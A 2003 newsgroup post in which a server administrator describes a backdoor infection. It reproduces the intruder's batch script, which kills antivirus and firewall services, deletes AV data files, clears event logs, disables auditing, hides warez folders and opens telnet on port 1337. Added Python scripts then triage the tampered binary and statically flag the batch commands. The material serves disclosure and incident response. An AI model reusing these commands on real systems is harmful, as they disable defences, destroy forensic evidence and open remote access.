VERY NASTY TROJAN -- SARC refuses to recognize it (long)
From: kfarmer@thuban.org (Keith Farmer)
Newsgroups: alt.comp.virus
Subject: VERY NASTY TROJAN -- SARC refuses to recognize it (long write-up)
NNTP-Posting-Host: 67.126.144.68
Message-ID: <6d668d6.0306031252.1e301208@posting.google.com>
SARC refuses to recognize this as a threat. So I'm spreading this where I may.
Just spent the day reinstalling a server. NAV missed one. Not merely that, but when brought to SARC's attention, they dismissed it.
They're losing a customer over this.
Turns out we had a backdoor hacked onto our system. Considering the system was fairly newly installed, we don't know if it got in through a WebDAV flaw or not, before the appropriate patches were installed.
Either way, here's what it did:
1) installed a hacked copy of the Serv-U ftp server.
This seems to contain a dictionary. Why would an ftp server contain a dictionary? SARC seems to think nothing of it.
2) created and REALLY REALLY LOCKED a couple directories to be used as dumping points for dvd rips. Administrator couldn't even change the access control.
3) replaced my system32/services.exe file with a hacked version.
If you bother to open the modified services.exe file in a bytecode editor (such as UltraEdit, something which SARC apparently didn't bother with), you see the following, at the very beginning -- "Use Win32 instead dumpass haha rofl!" and, at the end, "idontlikethosenastyavproggiesbelievemeidontlikethem" (repeats omitted). The legitimate file from Microsoft contains none of this.
It took us less than a minute to find these, as we're not the ones trained in it.
For some reason, SARC doesn't seem to think this is a sign that something's been altered in a system file. Obviously, someone at SARC is not doing their job.
4) installed MOAB.BAT and .EXE.
For some reason, attempts to forward this to SARC are failing. I wonder if they blocked my account. I'm certainly not going to pay for a phone call to their tech support just because they refused to listen to me. I'll just give my business elsewhere in that case. Hence, this posting.
5) Modified registry security, policy, you name it. For this reason alone, we reformatted and reinstalled.
6) Ports to watch out for, surprise surprise, include port 1337, as well as 2277 (a remote admin backdoor), and 539 (dec or hex, I don't know).
7) It will stop and/or delete the following AV and firewall services:
_Avp32.exe /y
_Avpcc.exe /y
_Avpm.exe /y
Ackwin32.exe /y
Agnitum Outpost Firewall /y
Anti-Trojan.exe /y
ANTIVIR /y
Apvxdwin.exe /y
ATRACK /y
Autodown.exe /y
AVCONSOL /y
Avconsol.exe /y
Ave32.exe /y
Avgctrl.exe /y
Avkserv.exe /y
Avnt.exe /y
Avp.exe /y
AVP.EXE /y
AVP32 /y
Avp32.exe /y
Avpcc.exe /y
Avpdos32.exe /y
Avpm.exe /y
Avptc32.exe /y
Avpupd.exe /y
Avsched32.exe /y
AVSync Manager /y
AVSYNMGR /y
Avwin95.exe /y
Avwupd32.exe /y
Blackd.exe /y
BLACKICE /y
BlackICE Defender /y
Blackice.exe /y
CA Sessionwall-3 /y
Cfiadmin.exe /y
Cfiaudit.exe /y
CFINET /y
Cfinet.exe /y
CFINET32 /y
Cfinet32.exe /y
Claw95.exe /y
Claw95cf.exe /y
Cleaner.exe /y
Cleaner3.exe /y
ConSeal PC Firewall & Private Desktop /y
Defwatch /y
Defwatch.exe /y
Dvp95.exe /y
Dvp95_0.exe /y
Ecengine.exe /y
eSafe Protect Desktop /y
Esafe.exe /y
Espwatch.exe /y
eTrust EZ Firewall /y
F-Agnt95.exe /y
Findviru.exe /y
Fprot.exe /y
F-Prot.exe /y
F-PROT95 /y
F-Prot95.exe /y
FP-WIN /y
Fp-Win.exe /y
Freedom 2 /y
Frw.exe /y
F-STOPW /y
F-Stopw.exe /y
GNAT Box Lite /y
IAMAPP /y
Iamapp.exe /y
Iamserv.exe /y
Ibmasn.exe /y
Ibmavsp.exe /y
Icload95.exe /y
Icloadnt.exe /y
ICMON /y
Icmon.exe /y
Icsupp95.exe /y
Icsuppnt.exe /y
Iface.exe /y
Internet Alert 99 /y
IOMON98 /y
Iomon98.exe /y
Jedi.exe /y
LOCKDOWN2000 /y
Lockdown2000.exe /y
Look'n'Stop /y
Look'n'Stop Lite /y
Lookout.exe /y
LUALL /y
Luall.exe /y
LUCOMSERVER /y
MCAFEE /y
McAfee Firewall /y
McAfee Internet Guard Dog Pro /y
Moolive.exe /y
Mpftray.exe /y
N32scanw.exe /y
NAVAPSVC /y
NAVAPW32 /y
Navapw32.exe /y
NAVLU32 /y
Navlu32.exe /y
Navnt.exe /y
NAVRUNR /y
NAVW32 /y
Navw32.exe /y
NAVWNT /y
Navwnt.exe /y
NeoWatch /y
NISSERV /y
NISUM /y
Nisum.exe /y
NMAIN /y
Nmain.exe /y
Norman Personal Firewall /y
Normist.exe /y
NORTON /y
Norton AntiVirus Server /y
Norton Internet Security /y
Norton Personal Firewall 2001 /y
Nupgrade.exe /y
NVC95 /y
Nvc95.exe /y
Outpost.exe /y
Padmin.exe /y
Pavcl.exe /y
Pavsched.exe /y
Pavw.exe /y
Pc firewall /y
PC Viper /y
PCCIOMON /y
PCCMAIN /y
PCCWIN98 /y
Pccwin98.exe /y
Pcfwallicon.exe /y
Persfw.exe /y
PGP Gauntlet /y
POP3TRAP /y
Proxy + /y
PVIEW95 /y
Rav7.exe /y
Rav7win.exe /y
Rescue.exe /y
RESCUE32 /y
SAFEWEB /y
Safeweb.exe /y
Scan32.exe /y
Scan95.exe /y
Scanpm.exe /y
Scrscan.exe /y
Serv95.exe /y
Smc.exe /y
SMCSERVICE /y
Snort - Win32 GUI /y
Snort (Intrusion Detection System) /y
Sphinx.exe /y
Sphinxwall /y
Sweep95.exe /y
Sybergen Secure Desktop /y
Sybergen SyGate /y
SYMPROXYSVC /y
Tbscan.exe /y
Tca.exe /y
Tds2-98.exe /y
Tds2-Nt.exe /y
TermiNET /y
TGBBOB /y
Tiny Personal Firewall /y
Vet95.exe /y
Vettray.exe /y
Vscan40.exe /y
Vsecomr.exe /y
VSHWIN32 /y
Vshwin32.exe /y
VSSTAT /y
Vsstat.exe /y
WEBSCANX /y
Webscanx.exe /y
WEBTRAP /y
Wfindv32.exe /y
Wingate /y
WinProxy /y
WinRoute /y
WyvernWorks Firewall /y
Zonealarm /y
Zonealarm.exe /y
AVP32 /y
LOCKDOWN2000 /y
AVP.EXE /y
CFINET32 /y
CFINET /y
ICMON /y
SAFEWEB /y
WEBSCANX /y
ANTIVIR /y
MCAFEE /y
NORTON /y
NVC95 /y
FP-WIN /y
IOMON98 /y
PCCWIN98 /y
F-PROT95 /y
F-STOPW /y
PVIEW95 /y
NAVWNT /y
NAVRUNR /y
NAVLU32 /y
NAVAPSVC /y
NISUM /y
SYMPROXYSVC /y
RESCUE32 /y
NISSERV /y
ATRACK /y
IAMAPP /y
LUCOMSERVER /y
LUALL /y
NMAIN /y
NAVW32 /y
NAVAPW32 /y
VSSTAT /y
VSHWIN32 /y
AVSYNMGR /y
AVCONSOL /y
WEBTRAP /y
POP3TRAP /y
PCCMAIN /y
PCCIOMON /y
del c:\*ANTI-VIR*.DAT /s
del c:\*CHKLIST*.DAT /s
del c:\*CHKLIST*.MS /s
del c:\*CHKLIST*.CPS /s
del c:\*CHKLIST*.TAV /s
del c:\*IVB*.NTZ /s
del c:\*SMARTCHK*.MS /s
del c:\*SMARTCHK*.CPS /s
del c:\*AVGQT*.DAT /s
del c:\*AGUARD*.DAT /s
8) other associated files:
attrib +s CommonDlg32.dll
attrib +s drvrquery32.exe
attrib +s clearlogs.exe
attrib +s script.exe
attrib +s auditpol.exe
attrib +s PSKILL.exe
attrib +s REG.exe
attrib +s TLIST.exe
attrib +s uptime.exe
attrib +s SystemInfo.exe
del /s winmgnt.exe
del /s servudaemon.exe
del /s servudaemon.ini
copy %windir%\drvrquery32.exe %windir%\system32\ /y
copy %windir%\CommonDlg32.dll %windir%\system32\ /y
%windir%\system32\drvrquery32.exe /s
%windir%\system32\drvrquery32.exe /h
%windir%\system32\drvrquery32.exe /i
md %windir%\system32\backup
copy %windir%\system32\CommonDlg32.dll %windir%\system32\backup
copy %windir%\system32\drvrquery32.exe %windir%\system32\backup
echo Windows Registry Editor Version 5.00 > protect.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters] >> protect.reg
echo "DisableWebDAV"=dword:00000001 >> protect.reg
regedit /s protect.reg
reg.exe IMPORT protect.reg
del protect.reg
net stop R_Server
regedit /s radmin.reg
nvsvc.exe /install /silence
net start R_Server
echo Windows Registry Editor Version 5.00 > config.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> config.reg
echo "NTLM"=dword:00000000 >> config.reg
echo "TelnetPort"=dword:00000539 >> config.reg
regedit.exe /s config.reg
del config.reg
net start telnet
auditpol /disable
del c:\*.log /s
del d:\*.log /s
clearlogs -app
clearlogs -sys
clearlogs -sec
md %windir%\system32\spool\Help\
md %windir%\system32\spool\Help\aux\ \
md %windir%\system32\spool\Help\aux\.tmp\
md %windir%\system32\spool\Help\aux\.tmp\scanfolder
md %windir%\system32\spool\Help\aux\.tmp\warez
cacls %windir%\system32\spool\Help\* /T /E /P Administrator:N
attrib +S +H %windir%\system32\spool\Help\aux\.tmp\ /S /D
copy login.txt %windir%\system32\spool\Help\aux\.tmp\
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >> bp.reg
echo "AutoShareServer"=dword:00000000 >> bp.reg
echo "AutoShareWks"=dword:00000000 >> bp.reg
regedit /s bp.reg
reg.exe IMPORT bp.reg
del bp.reg
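Item 3 of the post above identifies the tampered services.exe by text that the legitimate Microsoft binary never carries. The script below is an added example, not code from the post or from any vendor: a two-step triage for a suspect system binary, first a SHA-256 comparison against a trusted baseline, then a scan for the marker strings quoted in the post, plus a crude "strings" pass so unfamiliar text can be eyeballed. The sample blobs and the baseline hash are constructed for this demonstration; only the marker strings come from the post.

```python
import hashlib
import re

# Text markers the post reports inside the tampered services.exe.
TAMPER_MARKERS = [
    b"Use Win32 instead dumpass haha rofl!",
    b"idontlikethosenastyavproggiesbelievemeidontlikethem",
]


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of a file image, to be compared against a trusted baseline."""
    return hashlib.sha256(data).hexdigest()


def find_markers(data: bytes) -> list:
    """Locate each known marker; report its first offset and how often it repeats."""
    hits = []
    for marker in TAMPER_MARKERS:
        offsets = [m.start() for m in re.finditer(re.escape(marker), data)]
        if offsets:
            hits.append({"marker": marker.decode(), "first_offset": offsets[0], "count": len(offsets)})
    return hits


def printable_strings(data: bytes, min_len: int = 8) -> list:
    """Crude 'strings' pass: runs of printable ASCII at least min_len long."""
    return [s.decode() for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def triage(data: bytes, known_good: set) -> dict:
    """Verdict order: a baseline hash match is authoritative; otherwise markers decide."""
    digest = sha256_hex(data)
    hits = find_markers(data)
    if digest in known_good:
        verdict = "baseline-match"
    elif hits:
        verdict = "tampered"
    else:
        verdict = "unknown-hash"  # not in baseline, no known markers: compare against install media
    return {"sha256": digest, "verdict": verdict, "markers": hits, "strings": printable_strings(data)[:5]}


# Constructed samples (not real binaries): a 'clean' blob and one carrying the post's markers
# at the start and repeated at the end, as the post describes.
CLEAN_SAMPLE = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 200 + b"ServiceMain\x00" + b"\x00" * 100
TAMPERED_SAMPLE = b"MZ" + TAMPER_MARKERS[0] + CLEAN_SAMPLE[2:] + TAMPER_MARKERS[1] * 3
# A real baseline holds hashes taken from install media or a known-clean host (placeholder here).
BASELINE = {sha256_hex(CLEAN_SAMPLE)}

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_SAMPLE), ("tampered", TAMPERED_SAMPLE)):
        print(name, triage(blob, BASELINE))
```

The hash comparison is the check that actually decides the question; the marker scan is only a quick tell for this one sample, and a binary with no known markers is not thereby clean.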
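The MOAB.BAT listing under items 7 and 8 is what a responder would want to triage statically before touching the host again. The script below is an added example, not code from the post or from any vendor: it parses a batch file's text, reconstructs the registry values the script writes via `echo ... >> x.reg`, decodes the dword values (the TelnetPort value 0x539 is 1337 decimal), and flags anti-forensic, AV-tampering, hiding, ACL-lockdown and service-control commands by category. SAMPLE_SCRIPT is a constructed excerpt of the post's listing with the stripped colons restored; the rule names and categories are my own.

```python
import re

# Registry writes done via "echo ... >> file.reg"; the key line precedes its values.
REG_KEY = re.compile(r'^echo\s+\[(?P<key>[^\]]+)\]\s*>>\s*(?P<file>\S+)', re.I)
REG_VALUE = re.compile(r'^echo\s+"(?P<name>[^"]+)"=dword:?(?P<hex>[0-9a-f]{8})\s*>>\s*(?P<file>\S+)', re.I)

# Command patterns a defender would flag, with a category each (first match wins).
COMMAND_RULES = [
    ("anti-forensics", re.compile(r'^auditpol\s+/disable', re.I)),
    ("anti-forensics", re.compile(r'^clearlogs\s+-(app|sys|sec)', re.I)),
    ("anti-forensics", re.compile(r'^del\s+\S*\*\.log\s+/s', re.I)),
    ("av-tampering", re.compile(r'^del\s+\S*(CHKLIST|ANTI-VIR|SMARTCHK|AVGQT|AGUARD|IVB)\S*\s+/s', re.I)),
    ("hiding", re.compile(r'^attrib\s+.*\+[sh]', re.I)),
    ("acl-lockdown", re.compile(r'^cacls\s+.*\s/P\s+\S+:N', re.I)),
    ("service-control", re.compile(r'^net\s+(start|stop)\s+', re.I)),
]


def registry_findings(key: str, name: str, value: int):
    """Explain a registry write that matters to a responder, or None if uninteresting."""
    k, n = key.lower(), name.lower()
    if k.endswith("w3svc\\parameters") and n == "disablewebdav" and value == 1:
        return "IIS WebDAV disabled (the post suspects WebDAV as the entry point)"
    if "telnetserver" in k and n == "ntlm" and value == 0:
        return "Telnet NTLM authentication disabled (plaintext logons accepted)"
    if "telnetserver" in k and n == "telnetport":
        return f"Telnet service moved to port {value} (0x{value:04x})"
    if k.endswith("lanmanserver\\parameters") and n.startswith("autoshare") and value == 0:
        return f"{name}=0: default administrative shares disabled"
    return None


def scan_batch(text: str) -> list:
    """Return (category, line_number, detail) tuples for a batch script's text."""
    findings = []
    current_key = {}  # .reg file name -> key most recently echoed into it
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        m = REG_KEY.match(line)
        if m:
            current_key[m["file"]] = m["key"]
            continue
        m = REG_VALUE.match(line)
        if m:
            value = int(m["hex"], 16)  # REG_DWORD data is written in hex
            detail = registry_findings(current_key.get(m["file"], "?"), m["name"], value)
            if detail:
                findings.append(("registry", lineno, detail))
            continue
        for category, pattern in COMMAND_RULES:
            if pattern.match(line):
                findings.append((category, lineno, line))
                break
    return findings


def summarize(findings: list) -> dict:
    """Count findings per category."""
    counts = {}
    for category, _, _ in findings:
        counts[category] = counts.get(category, 0) + 1
    return counts


# Constructed excerpt of the post's MOAB.BAT listing (colons restored), used as sample input.
SAMPLE_SCRIPT = r"""
attrib +s clearlogs.exe
echo Windows Registry Editor Version 5.00 > protect.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters] >> protect.reg
echo "DisableWebDAV"=dword:00000001 >> protect.reg
regedit /s protect.reg
echo Windows Registry Editor Version 5.00 > config.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> config.reg
echo "NTLM"=dword:00000000 >> config.reg
echo "TelnetPort"=dword:00000539 >> config.reg
regedit.exe /s config.reg
net start telnet
auditpol /disable
del c:\*.log /s
clearlogs -sec
del c:\*CHKLIST*.DAT /s
cacls %windir%\system32\spool\Help\* /T /E /P Administrator:N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >> bp.reg
echo "AutoShareServer"=dword:00000000 >> bp.reg
"""

if __name__ == "__main__":
    for category, lineno, detail in scan_batch(SAMPLE_SCRIPT):
        print(f"{lineno:3d} {category:16s} {detail}")
    print(summarize(scan_batch(SAMPLE_SCRIPT)))
```

Each finding carries the line number, so the output doubles as a map of which registry keys, event logs and ACLs to re-check on a rebuilt host; the registry rules are the ones to extend when a new sample writes keys this list does not know.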
Responses to this topic
Symantec Anti-Virus Research Corporation
Does not sound like a back door, could very well be - I really don't know much about this.. lol
- Sounds like someone used some other flaw in some application, as you said, and force-hacked their way in...?? Via IIS or SQL or an SSH flaw?
I know some people who can do this and from what they have explained it is not overly difficult if the system is not locked down tight.
I can PM you some links for some info.